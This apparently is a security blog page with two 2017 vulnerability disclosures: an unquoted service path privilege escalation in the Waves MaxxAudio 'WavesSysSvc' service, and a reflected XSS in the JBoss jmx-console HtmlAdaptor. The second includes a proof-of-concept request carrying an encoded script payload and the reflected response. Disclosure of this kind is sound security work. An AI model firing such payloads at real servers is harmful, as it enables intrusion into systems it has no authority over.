Posts

Showing posts from 2017

Unquoted service path local privilege escalation CVE 2017-6005

Waves MaxxAudio, when installed, adds a Windows service named "WavesSysSvc". This service has a vulnerability known as Unquoted Service Path. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. Version tested on:

Reflected XSS in jmx-console HtmlAdaptor DatabasePersistencePlugin parameter

1) Description:
The jmx-console's DatabasePersistencePlugin parameter in HtmlAdaptor is vulnerable to XSS:
/jmx-console/HtmlAdaptor?DatabasePersistencePlugin

2) Exploit:
##############Request####################
https://abc.com:8080/jmx-console/HtmlAdaptor?DatabasePersistencePlugin=org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E&name=jboss.ejb%3aservice%3dEJBTimerService%2cpersistencePolicy%3ddatabase&action=updateAttributes&DataSource=jboss.jca%3aservice%3dDataSourceBinding%2cname%3dDefaultDS

############Response#####################
.............
<input type="text" name="DatabasePersistencePlugin" value="org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin"><script>alert(1)</script>" >
................

3) Fixed version:
Versions after 4.0.2 are fixed.

Note: Authenticated access to jmx-console is required to perform this XSS.